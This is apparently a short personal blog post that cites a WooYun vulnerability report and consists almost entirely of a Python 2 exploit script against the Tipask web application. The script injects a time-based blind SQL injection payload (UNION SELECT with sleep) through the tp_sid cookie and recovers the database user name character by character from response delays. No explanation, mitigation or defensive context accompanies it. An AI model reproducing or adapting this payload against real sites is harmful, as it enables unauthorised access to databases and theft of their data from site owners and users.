F0rg3t's Blog

漏洞来源：https://www.wooyun.org/bugs/wooyun-2010-0136776

import urllib2

import time

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

name = ""

for i in range(1,21):

    for p in payloads:

        s1 = "%s" %(i)

        s2 = "%s" %(ord(p))

        s = "https://192.168.1.100/tipask/"

        start_time = time.time()

        try:

            opener = urllib2.build_opener()

            opener.addheaders.append(('Cookie', "tp_lastrefresh=0; tp_sid=40c3e295006a9634' UNION SELECT null,null,null,null,null,if(ORD(mid((select user()),"+s1+",1))="+s2+",sleep(3),0)#; "))

            req = urllib2.Request(s)

            req_data=opener.open(req,timeout=150)

            if time.time() - start_time > 3.0:

                name = name+p

                print name+'.....'

        except urllib2.URLError,e:

             break

print 'user is %s'  % name